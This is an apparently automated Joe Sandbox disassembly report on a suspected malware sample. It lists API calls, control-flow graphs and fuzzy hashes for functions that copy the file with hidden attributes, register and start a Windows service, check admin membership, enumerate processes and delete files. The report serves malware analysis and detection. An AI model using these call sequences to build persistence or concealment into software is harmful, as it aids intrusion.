                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00EC84F7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00EC8599
                                                                                                                                                                                                              • Part of subcall function 00ED5200: GetVersionExA.KERNEL32(00F4AE70), ref: 00ED52CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000D05), ref: 00EC8B70
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00EC8DAC
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00EC8E86
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC8E9F
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00EC8EC3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00EC912B
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC9186
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00EC9265
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?), ref: 00EC9370
                                                                                                                                                                                                              • Part of subcall function 00ECA4E0: lstrlen.KERNEL32(?), ref: 00ECA4FE
                                                                                                                                                                                                              • Part of subcall function 00ECD500: lstrlen.KERNEL32(?,?,00ECD630,?), ref: 00ECD523
                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 00EC96D4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00EC9AC8
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC9AEC
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00EC9B0C
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000002), ref: 00EC9B3B
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00EC9C52
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00EC8CB2
                                                                                                                                                                                                              • Part of subcall function 00ECBBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ECBC90
                                                                                                                                                                                                              • Part of subcall function 00ECBBC0: Process32First.KERNEL32(00000000,?), ref: 00ECBCE3
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00EC86AE
                                                                                                                                                                                                              • Part of subcall function 00EC2800: ExitProcess.KERNEL32 ref: 00EC2842
                                                                                                                                                                                                              • Part of subcall function 00EF08B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EF0929
                                                                                                                                                                                                              • Part of subcall function 00EF08B0: __aulldiv.LIBCMT ref: 00EF0953
                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00EC9E32
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00F0D800,00000080), ref: 00EC9E88
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00F0D800,00000000), ref: 00EC9EA6
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(00F0D800,00000002), ref: 00EC9EC5
                                                                                                                                                                                                              • Part of subcall function 00ED0500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00ED0537
                                                                                                                                                                                                              • Part of subcall function 00ED0500: CreateServiceA.ADVAPI32(00000000,015BFCE0,015BFCE0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED0596
                                                                                                                                                                                                              • Part of subcall function 00ED0500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00ED0615
                                                                                                                                                                                                              • Part of subcall function 00ED0500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED062A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 00ECA26A
                                                                                                                                                                                                            • Sleep.KERNEL32(0000C350), ref: 00ECA327
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
                                                                                                                                                                                                            • String ID: zS$%Tmd$C:\Users\user$@L$}en
                                                                                                                                                                                                            • API String ID: 2964372999-4230071128
                                                                                                                                                                                                            • Opcode ID: 0be5985b8fe799c8f1809fd632388080f1bc45ba70144bf09da8d2b30f7f602b
                                                                                                                                                                                                            • Instruction ID: 63fad7c220372febe3c93908021eb780faca9e1418d5aa322e1edbe151803368
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0be5985b8fe799c8f1809fd632388080f1bc45ba70144bf09da8d2b30f7f602b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 282366B5A0030DDFD304EF61FE8AA763BB6F795320B11401AE941A62B5EB719861FF41
                                                                                                                                                                                                            Function 00ED5200 Relevance: 30.9, APIs: 12, Strings: 5, Instructions: 1106fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 493 ed5200-ed528c call ef0a20 496 ed528e-ed52ac 493->496 497 ed52b2-ed5338 GetVersionExA call ecb7a0 call ecfbc0 493->497 496->497 502 ed533e-ed5397 call ecf0d0 497->502 503 ed5598-ed5602 497->503 509 ed5399-ed53a5 502->509 510 ed53ab-ed5405 502->510 505 ed562d-ed56d0 call ec2f90 call ecd530 call ed1bb0 call ecd670 call ecdef0 call ed1d90 503->505 506 ed5604-ed5626 503->506 536 ed575d 505->536 537 ed56d6-ed575b DeleteFileA RemoveDirectoryA 505->537 506->505 509->510 512 ed541f-ed5446 call ecc580 510->512 513 ed5407-ed5419 510->513 520 ed5448-ed5482 512->520 521 ed5496-ed54b6 CreateDirectoryA call ec2f90 512->521 513->512 520->521 524 ed5484-ed5490 520->524 525 ed54bb-ed554d call ecc580 call ed1bb0 521->525 524->521 525->505 535 ed5553-ed5564 525->535 538 ed5575-ed5593 535->538 539 ed5566-ed5570 535->539 540 ed5760-ed57c9 call ecf0d0 536->540 537->540 538->505 539->505 543 ed580c-ed5883 call ecc580 CreateDirectoryA call ec13e0 540->543 544 ed57cb-ed57e0 540->544 551 ed58ad-ed5915 call ece430 CreateDirectoryA 543->551 552 ed5885-ed58a3 543->552 546 ed5802 544->546 547 ed57e2-ed5800 544->547 546->543 547->543 555 ed5917 551->555 556 ed5921-ed5964 call ec2f90 551->556 552->551 555->556 559 ed597b-ed59af call ecc580 556->559 560 ed5966-ed5975 556->560 563 ed59c5-ed59d7 559->563 564 ed59b1-ed59c3 559->564 560->559 565 ed59dd-ed5a35 call ec2f90 call ed1bb0 563->565 564->565 570 ed5a5a-ed5a67 565->570 571 ed5a37-ed5a58 565->571 572 ed5a6e-ed5a8b call ecd530 570->572 571->572 575 ed5a8d-ed5a9b 572->575 576 ed5aa2-ed5adc call ed1bb0 call ecd670 call ecdef0 call ed1d90 572->576 575->576 585 ed64f5-ed650b 576->585 586 ed5ae2-ed5b01 576->586 587 ed650d-ed6517 585->587 588 ed6519-ed6537 585->588 589 ed5b07-ed5b75 call ec2f90 call ef5820 586->589 590 ed5c42-ed5cec call ec2f90 call ef5820 call ed1bb0 586->590 591 ed653d-ed657c call ece430 SetFileAttributesA 587->591 588->591 606 ed5b97-ed5bd0 call ed1bb0 589->606 607 ed5b77-ed5b90 589->607 613 ed5d0e 590->613 614 ed5cee-ed5d0c 590->614 600 ed659c-ed65ce call eea7e0 call ece310 591->600 601 ed657e-ed6596 591->601 601->600 615 ed5c1f-ed5c3d 606->615 616 ed5bd2-ed5be4 606->616 607->606 618 ed5d10-ed5db5 call ecc580 CreateDirectoryA call ec13e0 613->618 614->618 615->618 616->618 619 ed5bea-ed5c1a 616->619 624 ed5e1c-ed5e37 618->624 625 ed5db7-ed5de6 618->625 619->618 628 ed5e39 624->628 629 ed5e43-ed5ec2 call ece430 CreateDirectoryA call ec2f90 624->629 626 ed5e08-ed5e1a 625->626 627 ed5de8-ed5e06 625->627 626->629 627->629 628->629 634 ed5ed4-ed5f12 call ecc580 629->634 635 ed5ec4-ed5ecf 629->635 638 ed5f14-ed5f2a 634->638 639 ed5f40-ed5fa0 call ec2f90 call ed1bb0 call ecd530 634->639 635->634 638->639 640 ed5f2c-ed5f39 638->640 647 ed5fc7-ed6007 call ed1bb0 call ecd670 call ecdef0 call ed1d90 639->647 648 ed5fa2-ed5fbb 639->648 640->639 658 ed600d-ed606b GetTempPathA call ecd500 647->658 659 ed64e1-ed64ee 647->659 648->647 649 ed5fbd 648->649 649->647 662 ed6169-ed61ea call ec13e0 call ece430 658->662 663 ed6071-ed607d 658->663 659->585 678 ed61ec 662->678 679 ed61f6-ed6217 CreateDirectoryA 662->679 665 ed607f-ed608c 663->665 666 ed6092-ed609a 663->666 665->666 668 ed609c-ed60b4 666->668 669 ed60da-ed60fe 666->669 673 ed60b6-ed60c9 668->673 674 ed60d0-ed60d3 668->674 670 ed610a-ed615d 669->670 671 ed6100 669->671 670->662 675 ed615f 670->675 671->670 673->674 674->663 677 ed60d5 674->677 675->662 677->662 678->679 680 ed6219-ed6225 679->680 681 ed622b-ed62db call ec2f90 call ecc580 call ec2f90 679->681 680->681 688 ed62dd-ed62ee 681->688 689 ed62fa-ed6342 call ed1bb0 681->689 688->689 690 ed62f0 688->690 693 ed6344-ed6351 689->693 694 ed6357-ed63ba call ecd530 call ed1bb0 call ecd670 call ecdef0 call ed1d90 689->694 690->689 693->694 705 ed64a5-ed64db 694->705 706 ed63c0-ed6441 GetTempPathA call ec13e0 call ec2f90 694->706 705->659 711 ed6455-ed649e call ecc580 call ed1bb0 706->711 712 ed6443-ed644f 706->712 711->705 712->711
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00F4AE70), ref: 00ED52CC
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 00ED549F
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00ED56FE
                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00000000), ref: 00ED5743
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00ED583A
                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00ED58F3
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED5D71
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED5E82
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 00ED6029
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED61FF
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 00ED63DE
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000002), ref: 00ED655F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 925bb23051e8c471d6ebb5af2d26a76914bdfcd0091c4bed04c4f089a929a301
                                                                                                                                                                                                            • Instruction ID: abfcbe54bab54213d3814a72406be92ffaf4c5afe7be77e91e877da7650f0108
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 925bb23051e8c471d6ebb5af2d26a76914bdfcd0091c4bed04c4f089a929a301
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA27AB6A0030DCFD704EF24FD86AB537B2F794320B11812AE941A62B5EB349856FF55
                                                                                                                                                                                                            Function 00EE9580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 787 ee9580-ee95a3 788 ee95a9-ee95d1 787->788 789 ee9963-ee9966 787->789 790 ee95dd-ee95f2 788->790 791 ee95d3 788->791 792 ee95fe-ee9707 call ed2a20 call ecd500 Sleep call ecc580 call ec2f90 790->792 793 ee95f4 790->793 791->790 802 ee9709-ee9721 792->802 803 ee9731-ee9747 792->803 793->792 804 ee974d-ee9773 call ecc580 802->804 805 ee9723-ee972f 802->805 803->804 808 ee9795-ee97d4 call ed1bb0 FindFirstFileA 804->808 809 ee9775-ee978f 804->809 805->804 812 ee9808-ee980a 808->812 813 ee97d6-ee9802 808->813 809->808 814 ee9902-ee9962 call eea7e0 812->814 815 ee9810-ee982b 812->815 813->812 814->789 817 ee9830-ee985c 815->817 819 ee985e 817->819 820 ee9864-ee98d3 call ecc580 DeleteFileA FindNextFileA 817->820 819->820 820->817 823 ee98d9-ee98fb FindClose 820->823 823->814
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8,00000001), ref: 00EE9679
                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,?), ref: 00EE97B8
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00EE98A9
                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 00EE98CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00EE98E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: ac1e4c0ab9b9a831f95783fb47e694b7c0f9868916f5366c2f48237303551781
                                                                                                                                                                                                            • Instruction ID: 6950b8e73a50d5a6e940f58eec48b889bba21fdfee3a4a832c18852762fef3a6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac1e4c0ab9b9a831f95783fb47e694b7c0f9868916f5366c2f48237303551781
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E91647990030CCFC704DF65FD826A53BB2FBA5320B00851AE941E72B0EB749991EF91
                                                                                                                                                                                                            Function 00ECB7A0 Relevance: 3.1, APIs: 2, Instructions: 89memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 852 ecb7a0-ecb84c AllocateAndInitializeSid 853 ecb84e-ecb85b 852->853 854 ecb861-ecb864 852->854 853->854 855 ecb8ee-ecb90e 854->855 856 ecb86a-ecb885 CheckTokenMembership 854->856 857 ecb8b4-ecb8e8 856->857 858 ecb887-ecb8ae 856->858 857->855 858->857
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ECB82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 00ECB87D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1663163955-0
                                                                                                                                                                                                            • Opcode ID: b99b2ea2c07c3505035aaa926b0df1d29582cfe75327581fdafaed6894d9bf2d
                                                                                                                                                                                                            • Instruction ID: ffba2ceb94bf1456ea7a13a27e2998c7e67abb3f18d5470507547d5549dffcda
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b99b2ea2c07c3505035aaa926b0df1d29582cfe75327581fdafaed6894d9bf2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A231FE7590534CEFD704CFA4EE999BA7BB8FB95300B00808EE802A72B0C7705949EB51
                                                                                                                                                                                                            Function 00ECE2C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 867 ece2c0-ece2e2 868 ece2e4-ece2ec 867->868 869 ece2f2-ece306 GetProcessHeap RtlAllocateHeap 867->869 868->869
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00EF220A,02167FFC,?,?,?,?,00EE463C), ref: 00ECE2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00EF220A,02167FFC,?,?,?,?,00EE463C), ref: 00ECE2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 4c5f0027bc496a47bcb0fd545884c702094ba51f364c49c1d3fad905b4552f84
                                                                                                                                                                                                            • Instruction ID: 095c8ced1ab3ed5ad4d1d26c4e797ec5230e1cd480721d6be8fef5534ee31a56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c5f0027bc496a47bcb0fd545884c702094ba51f364c49c1d3fad905b4552f84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AE04F76104208AFC7089BA6EC49A6537E8FB45205B048049F909D6275CA31A595DB94
                                                                                                                                                                                                            Function 00ECCA40 Relevance: 10.8, APIs: 7, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 717 ecca40-ecca9e 718 eccad4 717->718 719 eccaa0-eccab2 717->719 722 eccade-eccb37 call edc760 CreateFileA 718->722 720 eccac8-eccad2 719->720 721 eccab4-eccac6 719->721 720->722 721->722 725 eccb3d-eccb77 ReadFile 722->725 726 eccf6f-eccfa2 722->726 729 eccbbc-eccc61 FindCloseChangeNotification call ed2a20 GetTickCount call ef1520 725->729 730 eccb79-eccb9f 725->730 727 eccfc9-eccff0 call eda920 726->727 728 eccfa4-eccfc2 726->728 728->727 738 eccc7b-eccd12 call ecd500 call ecc580 call ec2f90 call ecc580 call ed1bb0 729->738 739 eccc63-eccc75 729->739 730->729 732 eccba1-eccbb5 730->732 732->729 750 ecce6c-ecce90 738->750 751 eccd18-eccd34 738->751 739->738 754 eccec4-eccef3 CreateFileA 750->754 755 ecce92-eccea4 750->755 752 eccd48-eccd8c call ec2f90 call ecd500 call ef5820 751->752 753 eccd36-eccd43 751->753 767 eccd8e-eccdbc 752->767 768 eccdd1-ecce2b call ed1bb0 752->768 753->752 758 eccf5d-eccf69 754->758 759 eccef5-eccf30 WriteFile 754->759 755->754 757 eccea6-eccebe 755->757 757->754 758->726 760 eccf46-eccf58 CloseHandle 759->760 761 eccf32-eccf3f 759->761 760->758 761->760 767->768 769 eccdbe-eccdcb 767->769 768->750 772 ecce2d-ecce42 768->772 769->768 773 ecce5a-ecce66 772->773 774 ecce44-ecce58 772->774 773->750 774->750
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,80000000,?,00000000,00000003,00000000,00000000), ref: 00ECCB20
                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,?,?,?,00000000), ref: 00ECCB5D
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ECCBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00ECCC1D
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00ECCED4
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00ECCF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00ECCF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseCreate$ChangeCountFindHandleNotificationReadTickWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 688250028-0
                                                                                                                                                                                                            • Opcode ID: b4c73c3def3c56f82adf71cdd6bee5ade527732cead8f7bb7944cc57ca1fb739
                                                                                                                                                                                                            • Instruction ID: d7381e5fe44d67d26ce6bd28d4b4684cf117103207dbf4625dcd88b56cb23a3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4c73c3def3c56f82adf71cdd6bee5ade527732cead8f7bb7944cc57ca1fb739
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20E18875A0020CDFC304EF24FD45BB93BB6FB91720B204119E946A72F4E7315956EB95
                                                                                                                                                                                                            Function 00EEFA80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 133processCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 775 eefa80-eefaa8 776 eefabe-eefadf 775->776 777 eefaaa-eefab7 775->777 778 eefb00-eefb19 776->778 779 eefae1-eefafe 776->779 777->776 780 eefb20-eefbf9 call eea7e0 * 2 CreateProcessA 778->780 779->780 785 eefc8f-eefcb3 780->785 786 eefbff-eefc8e CloseHandle * 2 780->786
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,H,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00EEFBF1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(H,?,?,?,?,?,00000000), ref: 00EEFC2F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EEFC58
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
